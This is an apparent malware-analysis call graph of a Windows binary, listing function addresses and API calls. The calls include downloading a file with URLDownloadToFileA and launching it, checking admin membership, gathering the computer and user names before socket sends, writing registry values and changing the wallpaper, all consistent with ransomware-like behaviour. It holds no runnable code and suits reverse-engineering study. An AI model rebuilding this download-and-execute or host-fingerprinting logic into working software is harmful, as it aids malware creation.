5858->5623 5859->5625 6112 403560 6113 40358c #4376 6112->6113 6114 40356e GetExitCodeThread 6112->6114 6115 403593 6113->6115 6114->6113 6114->6115 6510 40db60 send 6511 409f60 RectVisible 6512 401760 #6453 6513 401791 WaitForSingleObject TerminateThread CloseHandle 6512->6513 6514 4017b8 6512->6514 6513->6514 6515 40193e 6514->6515 6516 4018f6 6514->6516 6517 4017d8 sprintf fopen 6514->6517 6518 401915 6516->6518 6521 401903 rand 6516->6521 6519 401834 8 API calls 6517->6519 6520 4018da #1200 6517->6520 6518->6515 6522 401939 #1200 6518->6522 6519->6515 6520->6515 6521->6518 6522->6515 5860 40a070 DrawTextA 5861 404070 #693 5862 404088 5861->5862 5863 40407f #825 5861->5863 5863->5862 6117 408d70 6118 408e09 GetDeviceCaps 6117->6118 6120 408eb0 6118->6120 6126 408ed8 6118->6126 6121 408eba GetDeviceCaps GetDeviceCaps 6120->6121 6120->6126 6121->6126 6122 4090b6 #2414 6123 408f51 _ftol _ftol 6123->6126 6124 408fca _ftol _ftol _ftol 6125 409024 CreateSolidBrush #1641 6124->6125 6124->6126 6125->6126 6126->6122 6126->6123 6126->6124 6127 409048 FillRect #2414 6126->6127 6128 409083 #2754 6126->6128 6127->6126 6128->6126 6246 404670 6251 404690 DeleteCriticalSection 6246->6251 6248 404678 6249 404688 6248->6249 6250 40467f #825 6248->6250 6250->6249 6251->6248 6523 409b70 #2379 6530 403f70 6535 403f90 #2414 6530->6535 6532 403f78 6533 403f88 6532->6533 6534 403f7f #825 6532->6534 6534->6533 6535->6532 6536 404f70 #4476 6537 404f91 6536->6537 6538 404fc7 #3089 6536->6538 6537->6538 6539 404f9b 6537->6539 6252 403271 #2302 #2302 6253 406a00 #4476 6254 406a23 6253->6254 6256 406a62 6253->6256 6255 406a38 #3089 6254->6255 6254->6256 6255->6256 6257 406a46 #3089 6255->6257 6257->6256 6258 406a54 #3089 6257->6258 6258->6256 6259 401600 6260 4016e5 6259->6260 6261 40161a 6259->6261 6262 4016e9 #537 6260->6262 6266 4016de 6260->6266 6263 40161d 6261->6263 6264 40168f 6261->6264 6282 401970 #3092 #6199 #800 6262->6282 6268 401743 #2385 6263->6268 6271 401628 #537 6263->6271 6272 40165e 6263->6272 6265 401693 #537 6264->6265 6264->6266 6281 401970 #3092 #6199 #800 6265->6281 6266->6268 6270 401701 SendMessageA #2385 6279 401970 #3092 #6199 #800 6271->6279 6272->6266 6275 401663 #537 6272->6275 6273 4016ab SendMessageA #2385 6280 401970 #3092 #6199 #800 6275->6280 6276 401640 #2385 6278 40167b #2385 6279->6276 6280->6278 6281->6273 6282->6270 6540 403f00 6545 403f20 #2414 6540->6545 6542 403f08 6543 403f18 6542->6543 6544 403f0f #825 6542->6544 6544->6543 6545->6542 5531 413102 __set_app_type __p__fmode __p__commode 5532 413171 5531->5532 5533 413185 5532->5533 5534 413179 __setusermatherr 5532->5534 5543 4133b2 _controlfp 5533->5543 5534->5533 5536 41318a _initterm __getmainargs _initterm 5537 4131de GetStartupInfoA 5536->5537 5539 413212 GetModuleHandleA 5537->5539 5544 4133e6 #1576 5539->5544 5542 413236 exit _XcptFilter 5543->5536 5544->5542 5872 404410 SetCursor 5864 403810 WideCharToMultiByte 5867 403e60 SendMessageA #3998 SendMessageA 5864->5867 5866 403845 5867->5866 5868 403410 #4476 5869 403454 #3089 5868->5869 5870 403431 5868->5870 5871 40343b 5869->5871 5870->5869 5870->5871 6129 401110 #2302 6546 404310 6547 404333 6546->6547 6548 40433a #470 #5789 #5875 #6172 6546->6548 6549 4044c0 7 API calls 6547->6549 6550 40438a #5789 #755 6548->6550 6549->6548 6551 401f10 6552 401f30 6 API calls 6551->6552 6553 401f18 6552->6553 6554 401f28 6553->6554 6555 401f1f #825 6553->6555 6555->6554 6289 40ca19 6290 40ca26 6289->6290 6291 40ca28 #823 6289->6291 6290->6291 6134 409920 6139 4098c0 6134->6139 6137 409938 6138 40992f #825 6138->6137 6140 4098f2 #5875 6139->6140 6141 4098fb 6139->6141 6140->6141 6141->6137 6141->6138 6301 405a20 6302 405a25 6301->6302 6305 4130bb 6302->6305 6308 41308f 6305->6308 6307 405a4a 6309 4130a4 __dllonexit 6308->6309 6310 413098 _onexit 6308->6310 6309->6307 6310->6307 5874 409c20 #3797 5875 409c40 #6734 5874->5875 5876 409c36 5874->5876 5877 409c5b SendMessageA 5875->5877 5878 409c78 5875->5878 5877->5878 5879 409ce4 5878->5879 5880 409caa 5878->5880 5881 409cf6 5879->5881 5882 409ce8 InvalidateRect 5879->5882 5883 409cd4 #4284 5880->5883 5884 409cc4 #4284 5880->5884 5882->5881 5883->5881 5884->5881 6292 401220 6293 4012c2 #2379 6292->6293 6294 401233 6292->6294 6295 401243 SendMessageA KillTimer #4853 6294->6295 6296 40126b SendMessageA 6294->6296 6295->6296 6297 401285 SendMessageA 6296->6297 6298 401297 6296->6298 6297->6298 6298->6293 6299 4012a1 SendMessageA 6298->6299 6299->6293 6300 4012b8 6299->6300 6300->6293 6319 404620 #795 6320 404638 6319->6320 6321 40462f #825 6319->6321 6321->6320 5873 40a020 TabbedTextOutA 5885 408c20 5890 408b40 5885->5890 5887 408c28 5888 408c38 5887->5888 5889 408c2f #825 5887->5889 5889->5888 5891 408bd0 5890->5891 5892 408b78 BitBlt 5890->5892 5894 408bd6 #2414 #640 5891->5894 5895 408bc1 #5785 5892->5895 5896 408bb5 #5785 5892->5896 5894->5887 5895->5894 5896->5894 6311 409a20 6316 4099c0 6311->6316 6314 409a38 6315 409a2f #825 6315->6314 6317 409a03 6316->6317 6318 4099f3 #6170 6316->6318 6317->6314 6317->6315 6318->6317 6560 409b20 6561 409b31 6560->6561 6562 409b33 #6140 6560->6562 6561->6562 5897 413427 5898 41342c 5897->5898 5901 4133fe #1168 5898->5901 5902 413421 5901->5902 5903 413418 _setmbcp 5901->5903 5903->5902 5907 407c30 OpenClipboard 5908 407c42 GlobalAlloc 5907->5908 5909 407ca9 5907->5909 5910 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5908->5910 5911 407c5b CloseClipboard 5908->5911 5910->5909 6143 402d30 6144 402d73 #825 6143->6144 6145 402d3f 6143->6145 6146 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6145->6146 6146->6146 6147 402d72 6146->6147 6147->6144 5904 40d830 inet_addr 5905 40d844 gethostbyname 5904->5905 5906 40d84f 5904->5906 5905->5906 5912 404430 5913 40447b 5912->5913 5914 40443d _TrackMouseEvent #2379 5912->5914 5917 404489 5913->5917 5919 404530 5913->5919 5918 4044a1 SetCursor #2379 5917->5918 5920 4045c1 5919->5920 5921 404552 5919->5921 5920->5917 5921->5920 5922 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5921->5922 5922->5920 6142 406930 #6215 6322 405230 6329 405369 6322->6329 6332 40525a 6322->6332 6323 405552 InvalidateRect 6328 405560 6323->6328 6324 405285 6325 4052ee 7 API calls 6324->6325 6326 40528f #4277 #923 #858 #800 #800 6324->6326 6325->6323 6326->6323 6327 40539e 6330 405430 6327->6330 6331 4053aa 7 API calls 6327->6331 6329->6323 6329->6327 6336 405390 #940 6329->6336 6333 4054b4 6330->6333 6334 405435 7 API calls 6330->6334 6331->6323 6332->6324 6335 405277 #940 6332->6335 6337 4054b8 6333->6337 6339 405503 6333->6339 6334->6323 6335->6324 6335->6335 6336->6327 6336->6336 6337->6323 6338 4054de #6778 #6648 6337->6338 6338->6338 6340 405501 6338->6340 6339->6323 6339->6328 6341 405529 #6778 #6648 6339->6341 6340->6323 6341->6323 6341->6341 6342 40d630 6347 40d650 6342->6347 6344 40d638 6345 40d648 6344->6345 6346 40d63f #825 6344->6346 6346->6345 6348 40dad0 4 API calls 6347->6348 6349 40d680 6348->6349 6349->6344 6148 402531 6149 402543 6148->6149 6150 40253c CloseHandle 6148->6150 6151 402555 6149->6151 6152 40254e CloseHandle 6149->6152 6150->6149 6152->6151 6350 40ca3a 6353 40ca40 6350->6353 6351 40ca81 6352 40ca87 #825 6352->6351 6353->6351 6353->6352 5923 4068c0 #4837 6354 4032c0 6 API calls 6355 403334 SendMessageA #3092 6354->6355 6357 40335c SendMessageA #3092 6355->6357 6359 40337b SendMessageA #3092 6357->6359 6361 4033a0 SendMessageA 6359->6361 6362 40339d 6359->6362 6365 403cb0 FindFirstFileA 6361->6365 6362->6361 6364 4033b2 SendMessageA #3996 SendMessageA 6366 403cd9 6365->6366 6367 403ce3 6365->6367 6366->6364 6368 403e1f FindNextFileA 6367->6368 6370 403d14 sscanf 6367->6370 6368->6367 6369 403e3a FindClose 6368->6369 6369->6364 6370->6368 6371 403d38 fopen 6370->6371 6371->6368 6372 403d5c fread 6371->6372 6373 403e15 fclose 6372->6373 6377 403d7b 6372->6377 6373->6368 6374 403d8f sprintf 6375 403dd4 SendMessageA #823 SendMessageA 6374->6375 6375->6373 6377->6373 6377->6374 6377->6375 6378 401c30 inet_ntoa 6377->6378 6378->6377 6563 4043c0 #6453 #2414 6564 409fc0 TextOutA 5924 404cd0 5929 404cf0 #2414 #2414 #800 #641 5924->5929 5926 404cd8 5927 404ce8 5926->5927 5928 404cdf #825 5926->5928 5928->5927 5929->5926 4642 4064d0 #4710 SendMessageA SendMessageA 4686 401c70 wcscat 4642->4686 4644 406516 4645 406577 4644->4645 4646 40651d GetModuleFileNameA strrchr 4644->4646 4695 401a10 4645->4695 4647 40656c SetCurrentDirectoryA 4646->4647 4648 40655d strrchr 4646->4648 4647->4645 4648->4647 4650 406585 4651 4065e5 4650->4651 4652 40658c time 4650->4652 4705 402c40 4651->4705 4653 401a10 5 API calls 4652->4653 4653->4651 4655 4065ed __p___argc 4656 406606 4655->4656 4657 40678c 4656->4657 4658 40660f __p___argv 4656->4658 4753 407e80 SHGetFolderPathW wcslen 4657->4753 4660 406621 4658->4660 4663 406661 __p___argv 4660->4663 4664 406652 4660->4664 4661 406793 SetWindowTextW 4756 406f80 4661->4756 4667 40666d 4663->4667 4724 407f80 fopen 4664->4724 4665 4067a9 4814 406c20 GetUserDefaultLangID GetLocaleInfoA 4665->4814 4671 4066ad __p___argv 4667->4671 4672 40669e 4667->4672 4670 4067b0 SetTimer SetTimer 4674 4066b9 4671->4674 4734 4080c0 FindFirstFileA 4672->4734 4674->4657 4676 4066ee Sleep 4674->4676 4711 401bb0 AllocateAndInitializeSid 4676->4711 4678 406734 4679 406750 sprintf 4678->4679 4680 406738 4678->4680 4716 401a90 CreateProcessA 4679->4716 4752 401b50 ShellExecuteExA 4680->4752 4683 40674b 4685 406784 ExitProcess 4683->4685 4684 406781 4684->4685 4688 401cdc 4686->4688 4687 401d00 RegCreateKeyW 4687->4688 4688->4687 4689 401d62 RegQueryValueExA 4688->4689 4690 401d1d GetCurrentDirectoryA RegSetValueExA 4688->4690 4691 401dbb 4688->4691 4692 401d9e RegCloseKey 4689->4692 4693 401d90 SetCurrentDirectoryA 4689->4693 4690->4692 4691->4644 4692->4688 4694 401dc8 4692->4694 4693->4692 4694->4644 4696 401a1a fopen 4695->4696 4698 401a3a 4696->4698 4699 401a6f 4696->4699 4700 401a53 fwrite 4698->4700 4701 401a46 fread 4698->4701 4699->4650 4702 401a5e 4700->4702 4701->4702 4703 401a74 fclose 4702->4703 4704 401a66 fclose 4702->4704 4703->4650 4704->4699 4823 404b70 4705->4823 4707 402c46 4708 402c57 4707->4708 4709 402c5e LoadLibraryA 4707->4709 4708->4655 4709->4708 4710 402c73 7 API calls 4709->4710 4710->4708 4712 401bf6 4711->4712 4713 401bfb CheckTokenMembership 4711->4713 4712->4678 4714 401c10 4713->4714 4715 401c14 FreeSid 4713->4715 4714->4715 4715->4678 4717 401b45 4716->4717 4718 401aed 4716->4718 4717->4684 4719 401af5 WaitForSingleObject 4718->4719 4720 401b26 CloseHandle CloseHandle 4718->4720 4721 401b12 4719->4721 4722 401b05 TerminateProcess 4719->4722 4720->4684 4721->4720 4723 401b1a GetExitCodeProcess 4721->4723 4722->4721 4723->4720 4725 407fd0 fread fclose 4724->4725 4733 406659 ExitProcess 4724->4733 4828 40be90 strncpy strncpy strncpy 4725->4828 4727 408002 4829 40c4f0 4727->4829 4729 40801d 4730 40c4f0 112 API calls 4729->4730 4731 408041 4729->4731 4730->4731 4732 401a10 5 API calls 4731->4732 4731->4733 4732->4733 4735 40820a 4734->4735 4747 408124 4734->4747 5288 401e30 4735->5288 4738 4081e4 FindNextFileA 4739 4081ff FindClose 4738->4739 4738->4747 4739->4735 4740 401e30 2 API calls 4742 408255 sprintf #537 4740->4742 4741 408158 sscanf 4741->4738 4743 408178 fopen 4741->4743 5293 4082c0 4742->5293 4743->4738 4745 408190 fread 4743->4745 4745->4747 4748 4081bd fclose 4745->4748 4747->4738 4747->4741 4747->4748 4748->4738 4748->4747 4749 408291 #537 4751 4082c0 141 API calls 4749->4751 4750 4066a5 ExitProcess 4751->4750 4752->4683 4754 407f02 4753->4754 4755 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4753->4755 4754->4661 4755->4661 5350 4076a0 4756->5350 4758 406fa8 27 API calls 4759 407119 4758->4759 4760 40711c SendMessageA #3092 4758->4760 4759->4760 4761 40713d SendMessageA #3092 4760->4761 4763 40715f SendMessageA #3092 4761->4763 4765 407181 SendMessageA #3092 4763->4765 4767 4071a3 SendMessageA #3092 4765->4767 4769 4071c5 SendMessageA #3092 4767->4769 4771 4071e7 4769->4771 4772 4071ea SendMessageA #3092 4769->4772 4771->4772 4773 407205 SendMessageA #3092 4772->4773 4775 407227 SendMessageA #3092 4773->4775 4777 407249 SendMessageA #3092 4775->4777 4779 40726b 4777->4779 4780 40726e SendMessageA #860 4777->4780 4779->4780 4781 4072a4 4780->4781 4782 4072ed #537 4781->4782 5366 404210 #858 #800 4782->5366 4784 407309 #537 5367 404210 #858 #800 4784->5367 4786 407325 #540 #2818 #535 5368 404210 #858 #800 4786->5368 4788 407369 5369 404270 4788->5369 4792 4073a8 SendMessageA SendMessageA #6140 #6140 4793 407428 4792->4793 5373 405920 4793->5373 4797 407457 5381 4058c0 4797->5381 4799 407460 5384 405180 _mbscmp 4799->5384 4801 407477 4802 405920 2 API calls 4801->4802 4803 4074ac 4802->4803 4804 405860 2 API calls 4803->4804 4805 4074b5 4804->4805 4806 4058c0 2 API calls 4805->4806 4807 4074be 4806->4807 4808 405180 4 API calls 4807->4808 4809 4074d5 GetTimeZoneInformation 4808->4809 5390 401e60 VariantTimeToSystemTime 4809->5390 4811 407508 SystemTimeToTzSpecificLocalTime #2818 5391 401e60 VariantTimeToSystemTime 4811->5391 4813 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4813->4665 4815 406c81 SendMessageA 4814->4815 4816 406c5d 4814->4816 4817 406cc1 SendMessageA 4815->4817 4818 406ca1 SendMessageA 4815->4818 4816->4815 4820 406ae0 27 API calls 4817->4820 5398 406ae0 8 API calls 4818->5398 4821 406cdd 4820->4821 4821->4670 4822 406cba 4822->4670 4824 404b81 LoadLibraryA 4823->4824 4825 404b7a 4823->4825 4826 404b96 6 API calls 4824->4826 4827 404bf6 4824->4827 4825->4707 4826->4827 4827->4707 4828->4727 4830 40c50f 4829->4830 4843 40bed0 4830->4843 4832 40c54b 4833 40c596 4832->4833 4862 40dd00 4832->4862 4865 40dbf0 4833->4865 4836 40c5e7 4836->4729 4837 40c568 4837->4833 4838 40c600 4837->4838 4839 40c635 4838->4839 4840 40c617 strncpy 4838->4840 4841 40dbf0 free 4839->4841 4840->4839 4842 40c650 4841->4842 4842->4729 4844 40bef5 4843->4844 4845 40bf0a #823 4843->4845 4844->4845 4846 40bf2e 4845->4846 4847 40bf27 4845->4847 4849 40bf46 4846->4849 4873 40baf0 4846->4873 4869 40d5e0 4847->4869 4849->4832 4852 40bf72 4852->4832 4853 40bf8a GetComputerNameA GetUserNameA 4905 40dc00 4853->4905 4856 40dd00 4 API calls 4857 40c01f 4856->4857 4858 40dc00 4 API calls 4857->4858 4859 40c038 4858->4859 4860 40dd00 4 API calls 4859->4860 4861 40c047 4860->4861 4861->4832 4863 40dc00 4 API calls 4862->4863 4864 40dd1c 4863->4864 4864->4837 4866 40dd70 4865->4866 4867 40dd8b 4866->4867 5284 412ac0 4866->5284 4867->4836 4870 40d602 4869->4870 4914 40dad0 4870->4914 4917 40ba10 4873->4917 4875 40bdf5 4875->4852 4875->4853 4876 40bb14 4876->4875 4877 40bb42 4876->4877 4922 40ba60 4876->4922 4877->4875 4926 40c8f0 #823 4877->4926 4881 40bc1b strtok 4885 40bc30 4881->4885 4896 40bbb7 4881->4896 4882 40ba60 closesocket 4884 40bc8b 4882->4884 4886 40bc92 4884->4886 4887 40bcec GetTickCount srand 4884->4887 4885->4882 4885->4887 4948 40c860 4886->4948 4890 40bdc7 4887->4890 4891 40bd07 rand 4887->4891 4893 40c860 2 API calls 4890->4893 4901 40bd1e 4891->4901 4892 40bcd8 #825 4892->4875 4895 40bde8 #825 4893->4895 4895->4875 4896->4881 4898 40c7b0 #825 4896->4898 4928 40c7b0 4896->4928 4932 40c920 4896->4932 4944 40c800 #823 4896->4944 4897 40ba60 closesocket 4897->4901 4898->4881 4899 40be75 #825 4899->4875 4900 40be11 4900->4899 4960 40c740 4900->4960 4901->4897 4901->4900 4954 40ce50 4901->4954 4906 40dc15 4905->4906 4912 40c013 4905->4912 4907 40dc77 4906->4907 4908 40dc49 4906->4908 4906->4912 5283 412aa0 realloc 4907->5283 5282 412a90 malloc 4908->5282 4911 40dc51 4911->4912 4913 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4911->4913 4912->4856 4913->4912 4915 40d61e 4914->4915 4916 40dadf setsockopt send shutdown closesocket 4914->4916 4915->4846 4916->4915 4918 40ba27 4917->4918 4919 40ba2b 4918->4919 4965 40b840 sprintf GetFileAttributesA 4918->4965 4919->4876 4921 40ba31 4921->4876 4923 40ba88 4922->4923 5218 40d8c0 4923->5218 4927 40bb62 strtok 4926->4927 4927->4885 4927->4896 4929 40c7d0 4928->4929 4930 40c7bb 4928->4930 4929->4896 4930->4929 4931 40c7d6 #825 4930->4931 4931->4929 4933 40c932 4932->4933 4934 40c92d ?_Xlen@std@ 4932->4934 4935 40c973 4933->4935 4936 40c963 4933->4936 4937 40c946 4933->4937 4934->4933 4940 40c990 4935->4940 4941 40c7b0 #825 4935->4941 4938 40c7b0 #825 4936->4938 4942 40c94a 4937->4942 5222 40c9c0 4937->5222 4939 40c96c 4938->4939 4939->4896 4940->4896 4941->4937 4942->4896 4945 40c81f 4944->4945 5228 40cad0 4945->5228 4947 40c844 4947->4896 4949 40c8d9 4948->4949 4951 40c870 4948->4951 4949->4892 4950 40c8ab #825 4950->4951 4953 40c8cc 4950->4953 4951->4950 4952 40c8a2 #825 4951->4952 4952->4950 4953->4892 4955 40ce68 4954->4955 4956 40ce5a 4954->4956 4958 40ce94 #825 4955->4958 4959 40bd9e #825 Sleep 4955->4959 4956->4955 4957 40ce6e #825 4956->4957 4957->4955 4958->4959 4959->4890 4959->4891 4961 40c761 4960->4961 4962 40c77e #825 4960->4962 4963 40c775 #825 4961->4963 4964 40c76f 4961->4964 4962->4900 4963->4962 4964->4962 4966 40b898 4965->4966 4967 40b95b CreateProcessA 4965->4967 4982 40b6a0 CreateDirectoryA 4966->4982 4969 40b9b4 4967->4969 4970 40b9bf WaitForSingleObject 4967->4970 4969->4921 4971 40b9e4 CloseHandle CloseHandle 4970->4971 4972 40b9d8 WaitForSingleObject 4970->4972 4971->4921 4972->4971 4973 40b8a9 4974 40b8e9 sprintf GetFileAttributesA 4973->4974 4996 40b780 CreateDirectoryA 4973->4996 4976 40b946 CopyFileA 4974->4976 4977 40b93b 4974->4977 4976->4967 4977->4921 4978 40b8c1 4978->4974 4979 40b780 60 API calls 4978->4979 4980 40b8d9 4979->4980 4980->4974 4981 40b8e0 4980->4981 4981->4921 5004 412920 4982->5004 4985 40b6d8 DeleteFileA 4985->4973 4986 40b6ec 5007 412940 4986->5007 4988 40b70e 4989 40b719 4988->4989 4990 40b76a 4988->4990 4992 412940 14 API calls 4988->4992 4989->4973 5016 412a00 4990->5016 4994 40b738 sprintf 4992->4994 4993 40b770 4993->4973 5013 4129e0 4994->5013 4997 40b81b 4996->4997 4998 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 4996->4998 4997->4978 4999 40b810 DeleteFileA 4998->4999 5000 40b7f6 4998->5000 4999->4997 5001 40b6a0 54 API calls 5000->5001 5002 40b809 5001->5002 5002->4999 5003 40b827 DeleteFileA 5002->5003 5003->4978 5027 4127e0 #823 5004->5027 5006 40b6cf 5006->4985 5006->4986 5008 412964 5007->5008 5009 412959 5007->5009 5010 412969 5008->5010 5053 411cf0 5008->5053 5009->4988 5010->4988 5012 412982 5012->4988 5143 412990 5013->5143 5015 4129f8 5015->4988 5017 412a15 5016->5017 5018 412a09 5016->5018 5019 412a1a 5017->5019 5205 4127a0 5017->5205 5018->4993 5019->4993 5022 412a7d #825 5022->4993 5023 412a44 #825 5024 412a4d 5023->5024 5025 412a61 #825 5024->5025 5026 412a6a #825 5024->5026 5025->5026 5026->5022 5028 412815 5027->5028 5029 41287a 5027->5029 5028->5029 5030 41283d #823 5028->5030 5040 411c00 5029->5040 5030->5029 5032 41289d 5033 4128a6 5032->5033 5034 4128f8 #823 5032->5034 5035 4128e5 5033->5035 5036 4128b4 #825 5033->5036 5037 4128bd 5033->5037 5034->5006 5035->5006 5036->5037 5038 4128d6 #825 5037->5038 5039 4128cd #825 5037->5039 5038->5035 5039->5038 5041 411c10 5040->5041 5042 411ce2 5040->5042 5041->5042 5043 411c1a GetCurrentDirectoryA 5041->5043 5042->5032 5044 411c45 5043->5044 5045 411c80 SetFilePointer 5044->5045 5046 411c9e 5044->5046 5045->5046 5047 411c92 5045->5047 5048 4108a0 CreateFileA SetFilePointer #823 SetFilePointer 5046->5048 5047->5032 5049 411caf 5048->5049 5050 411cb6 5049->5050 5051 410dc0 9 API calls 5049->5051 5050->5032 5052 411cc7 5051->5052 5052->5032 5054 412231 5053->5054 5055 411d11 5053->5055 5054->5012 5055->5054 5059 411d27 5055->5059 5086 411ac0 5055->5086 5057 411d37 5057->5012 5058 411dc2 5061 411ddc 5058->5061 5098 4113e0 5058->5098 5059->5057 5059->5058 5093 411390 5059->5093 5104 411350 5061->5104 5066 411e15 5067 411e1c 5066->5067 5131 410a50 5066->5131 5067->5012 5069 411e3e 5070 411e45 5069->5070 5071 411e56 #823 5069->5071 5070->5012 5138 410af0 5071->5138 5073 411e78 5074 411e83 #825 5073->5074 5075 411e9d _mbsstr 5073->5075 5074->5012 5077 411f15 _mbsstr 5075->5077 5077->5075 5078 411f2c _mbsstr 5077->5078 5078->5075 5079 411f43 _mbsstr 5078->5079 5079->5075 5080 411f5a 5079->5080 5142 411b80 SystemTimeToFileTime 5080->5142 5082 412063 LocalFileTimeToFileTime 5085 4120b6 5082->5085 5083 412203 5083->5012 5084 4121fa #825 5084->5083 5085->5083 5085->5084 5087 411acd 5086->5087 5089 411ad6 5086->5089 5087->5059 5088 411add 5088->5059 5089->5088 5090 411b02 free 5089->5090 5092 411b11 5089->5092 5090->5092 5091 411b2a free 5091->5059 5092->5091 5094 4113a0 5093->5094 5095 411399 5093->5095 5096 411000 SetFilePointer SetFilePointer ReadFile 5094->5096 5095->5058 5097 4113c7 5096->5097 5097->5058 5099 4113f0 5098->5099 5100 4113e9 5098->5100 5101 4113f7 5099->5101 5102 411000 SetFilePointer SetFilePointer ReadFile 5099->5102 5100->5058 5101->5058 5103 411444 5102->5103 5103->5058 5105 411000 SetFilePointer SetFilePointer ReadFile 5104->5105 5106 41137f 5105->5106 5107 411460 5106->5107 5108 410a50 SetFilePointer SetFilePointer 5107->5108 5109 411491 5108->5109 5110 411498 5109->5110 5111 410c00 ReadFile 5109->5111 5110->5066 5112 4114af 5111->5112 5113 410bb0 ReadFile 5112->5113 5114 4114d7 5113->5114 5115 410bb0 ReadFile 5114->5115 5116 4114ee 5115->5116 5117 410bb0 ReadFile 5116->5117 5118 411505 5117->5118 5119 410c00 ReadFile 5118->5119 5120 41153b 5119->5120 5121 410c00 ReadFile 5120->5121 5122 411552 5121->5122 5123 410c00 ReadFile 5122->5123 5125 411586 5123->5125 5124 410c00 ReadFile 5126 4115ba 5124->5126 5125->5124 5127 410bb0 ReadFile 5126->5127 5129 4115ee 5127->5129 5128 410bb0 ReadFile 5130 411621 5128->5130 5129->5128 5130->5066 5132 410a5a 5131->5132 5135 410aaa 5131->5135 5133 410a82 5132->5133 5134 410a69 SetFilePointer 5132->5134 5132->5135 5136 410aa4 5133->5136 5137 410a90 SetFilePointer 5133->5137 5134->5069 5135->5069 5136->5069 5137->5069 5139 410b31 5138->5139 5140 410b07 ReadFile 5138->5140 5139->5073 5141 410b22 5140->5141 5141->5073 5142->5082 5144 4129a3 5143->5144 5145 412998 5143->5145 5146 4129a8 5144->5146 5149 412360 5144->5149 5145->5015 5146->5015 5148 4129cf 5148->5015 5150 412378 5149->5150 5151 41239c 5149->5151 5155 4124ab 5150->5155 5156 41238a 5150->5156 5161 411ac0 free free 5150->5161 5152 41240e 5151->5152 5153 4123b7 5151->5153 5158 411ac0 free free 5151->5158 5154 411810 SetFilePointer SetFilePointer ReadFile 5152->5154 5160 4123c8 5153->5160 5164 4123e5 5153->5164 5168 411390 SetFilePointer SetFilePointer ReadFile 5153->5168 5159 412431 5154->5159 5157 4124bf 5155->5157 5162 4124dc 5155->5162 5165 411390 SetFilePointer SetFilePointer ReadFile 5155->5165 5156->5148 5157->5148 5158->5153 5163 412442 5159->5163 5166 411ac0 free free 5159->5166 5160->5148 5161->5155 5167 4124f6 5162->5167 5170 4113e0 SetFilePointer SetFilePointer ReadFile 5162->5170 5163->5148 5169 4123ff 5164->5169 5172 4113e0 SetFilePointer SetFilePointer ReadFile 5164->5172 5165->5162 5166->5163 5171 411cf0 14 API calls 5167->5171 5168->5164 5173 411660 8 API calls 5169->5173 5170->5162 5174 412506 5171->5174 5172->5164 5173->5152 5175 412578 5174->5175 5179 412510 5174->5179 5176 41257d 5175->5176 5180 4125da 5175->5180 5185 4125df wsprintfA 5175->5185 5187 412671 wsprintfA 5175->5187 5182 412637 5176->5182 5183 411660 8 API calls 5176->5183 5177 412515 5177->5148 5178 41253f 5181 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5178->5181 5179->5177 5179->5178 5184 412559 5179->5184 5180->5185 5186 412547 5181->5186 5182->5148 5188 4126ad 5183->5188 5190 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5184->5190 5189 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5185->5189 5186->5148 5191 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5187->5191 5192 4126ba #823 5188->5192 5201 4126cd 5188->5201 5193 41260a CreateFileA 5189->5193 5194 412566 5190->5194 5191->5193 5192->5201 5193->5176 5194->5148 5196 411810 SetFilePointer SetFilePointer ReadFile 5196->5201 5197 412728 5198 412776 5197->5198 5199 41276f CloseHandle 5197->5199 5202 411ac0 free free 5198->5202 5199->5198 5200 412704 WriteFile 5200->5197 5200->5201 5201->5196 5201->5197 5201->5200 5203 412746 SetFileTime 5201->5203 5204 41277e 5202->5204 5203->5197 5204->5148 5206 4127b1 5205->5206 5207 4127a9 5205->5207 5209 4127c7 5206->5209 5211 410f70 5206->5211 5208 411ac0 2 API calls 5207->5208 5208->5206 5209->5022 5209->5023 5209->5024 5212 410f80 5211->5212 5213 410f79 5211->5213 5214 410f8d 5212->5214 5215 411ac0 free free 5212->5215 5213->5209 5216 4109c0 CloseHandle #825 5214->5216 5215->5214 5217 410f98 free 5216->5217 5217->5209 5220 40d8ec 5218->5220 5219 40daad closesocket 5221 40baa8 5219->5221 5220->5219 5220->5221 5221->4877 5223 40c9f6 #823 5222->5223 5227 40ca40 5223->5227 5225 40ca81 5225->4940 5226 40ca87 #825 5226->5225 5227->5225 5227->5226 5229 40cbf3 5228->5229 5230 40cb00 5228->5230 5229->4947 5231 40cb26 5230->5231 5237 40cb90 5230->5237 5232 40cb31 5231->5232 5233 40cb2c ?_Xran@std@ 5231->5233 5247 40cd80 5232->5247 5233->5232 5234 40cbe9 5236 40cc60 5 API calls 5234->5236 5236->5229 5237->5234 5239 40cbaa 5237->5239 5238 40cb38 5241 40cb6a 5238->5241 5242 40cb47 memmove 5238->5242 5240 40c7b0 #825 5239->5240 5243 40cbb3 5240->5243 5245 40cd80 4 API calls 5241->5245 5264 40cc60 5242->5264 5243->4947 5246 40cb7d 5245->5246 5246->4947 5248 40cd93 5247->5248 5249 40ce27 5247->5249 5248->5249 5250 40cdd0 5248->5250 5251 40cdc9 ?_Xlen@std@ 5248->5251 5249->5238 5252 40cdf8 5250->5252 5255 40cde2 5250->5255 5251->5250 5253 40ce0a 5252->5253 5254 40cdfc 5252->5254 5253->5249 5260 40c7b0 #825 5253->5260 5256 40c7b0 #825 5254->5256 5257 40cde6 5255->5257 5258 40ce1f 5255->5258 5259 40ce05 5256->5259 5261 40c7b0 #825 5257->5261 5262 40c9c0 2 API calls 5258->5262 5259->5238 5260->5258 5263 40cdf3 5261->5263 5262->5249 5263->5238 5265 40cc73 5264->5265 5266 40cc6e ?_Xlen@std@ 5264->5266 5267 40cd04 5265->5267 5268 40cc88 5265->5268 5269 40ccae 5265->5269 5266->5265 5267->5268 5274 40cd08 5267->5274 5270 40cc90 5268->5270 5273 40c9c0 2 API calls 5268->5273 5272 40ccd9 #825 5269->5272 5276 40ccc4 5269->5276 5270->5241 5271 40cd4c 5277 